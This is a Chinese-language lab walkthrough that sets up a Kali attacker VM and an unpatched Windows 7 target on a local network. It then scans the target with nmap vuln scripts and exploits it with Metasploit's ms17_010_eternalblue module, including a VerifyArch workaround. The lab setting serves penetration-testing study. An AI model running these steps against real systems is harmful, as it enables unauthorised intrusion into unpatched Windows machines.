靶机系统;
Windows 7 sp1 192.168.151 .222
下载链接;
ed2k://|file|cn_windows_7_professional_with_sp1_vl_build_x86_dvd_u_677939.iso|2502909952|935E5B4B754527BE3C238FA6ABDD9B86|/
攻击系统;kali 2017 IP 192.168.151.212 防火墙已经关闭
win7设置IP如下
注:把IP设置在同一网段上。在虚拟机下设置在同一网卡下进行,如这样就互相ping的通,但是连接不到外网,也可以使用桥接模式,使用xerosploit去嗅探局域网内的IP
xerosploit项目地址;https://github.com/LionSec/xerosploit
kali设置如下;
使用ifconfig查看kali的IP
这种情况是还没有配的,配置命令如下
vi /etc/network/interfaces
address是你的IP netmask是你的子网掩码 getway是你的网关
如果进去发现无法编辑,摁键盘上的" i" 编辑,然后摁ESC,打 ":wq"退出
输入 vi /etc/resolv.conf
配置DNS nameserver 8.8.8.8
然后重启网络即可
/etc/init.d/networking start
尝试ping
虽然从网上随便下了一个win7,但是也不知道有什么漏洞,还是用nmap扫一下
在kali终端下输入;
msfconsole 进入msf
输入;nmap -sV --script=vuln IP
继续
输入search ms17-010查找
输入use exploit/windows/smb/ms17_010_eternalblue
输入show payloads查找一会设置的payloads
设置好
然后输入run
ok
如果你在学习本文的内容出现了如下情况
输入set VerifyArch false
即可解决